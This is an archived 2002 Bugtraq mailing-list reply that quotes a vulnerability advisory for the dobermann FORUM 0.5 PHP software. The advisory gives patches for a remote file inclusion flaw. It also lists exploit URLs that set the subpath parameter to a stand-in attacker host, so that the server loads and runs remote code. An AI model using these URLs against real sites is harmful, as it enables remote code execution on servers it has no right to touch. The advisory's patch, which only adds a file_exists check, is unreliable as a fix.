[27631] in bugtraq
RE: dobermann FORUM (php)
daemon@ATHENA.MIT.EDU (Mark Stunnenberg)
Tue Oct 29 12:26:21 2002
From: "Mark Stunnenberg" <marksg@chello.nl>
To: "'Frog Man'" <leseulfrog@hotmail.com>, <bugtraq@securityfocus.com>
Date: Tue, 29 Oct 2002 10:00:22 +0100
Message-ID: <97637D952F5B27468F0BDF32F912DB1E0C63AC@spain.gac.nl>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
In-Reply-To: <97637D952F5B27468F0BDF32F912DB1E15F42C@spain.gac.nl>
Content-Transfer-Encoding: 8bit
Or place a:
--------------------
<? $subpath = ''; ?>
--------------------
Right above the place where the actual $subpath is being set.
Mark
> -----Original Message-----
> From: Frog Man [mailto:leseulfrog@hotmail.com]
> Sent: zondag 27 oktober 2002 P 23:53
> To: bugtraq@securityfocus.com
> Subject: dobermann FORUM (php)
>
>
> Informations :
> °°°°°°°°°°°°°°
> Product : dobermann FORUM
> version : 0.5
> website : http://www.le-dobermann.com
> Problem : Include file
>
> PHP Code/location :
> °°°°°°°°°°°°°°°°°°°
> entete.php
> enteteacceuil.php
> topic/entete.php :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
>
> index.php
> newtopic.php :
> ------------------------
> @require "config.php";
> @include("entete.php");
> ------------------------
>
> Exploits :
> °°°°°°°°°° http://[target]/entete.php?subpath=http://[attacker]/
> http://[target]/enteteacceuil.php?subpath=http://[attacker]/
> http://[target]/topic/entete.php?subpath=http://[attacker]/
> http://[target]/index.php?subpath=http://[attacker]/
> http://[target]/newtopic.php?subpath=http://[attacker]/
> with
> http://[attacker]/banniere.php
>
> Patch :
> °°°°°°°
> In files :
> ------------------
> entete.php
> enteteacceuil.php
> topic/entete.php
> ------------------
> replace the line :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
> by :
> ------------------------------------------
> <?php
> $banfile=$subpath."banniere.php";
> if (file_exists($banfile)){
> @include $banfile; }
> ?>
> ------------------------------------------
>
>
>
> More details in french :
> http://www.frog-> man.org/tutos/dobermannFORUM.txt
> translated
> by Google :
> http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-
man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-
1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
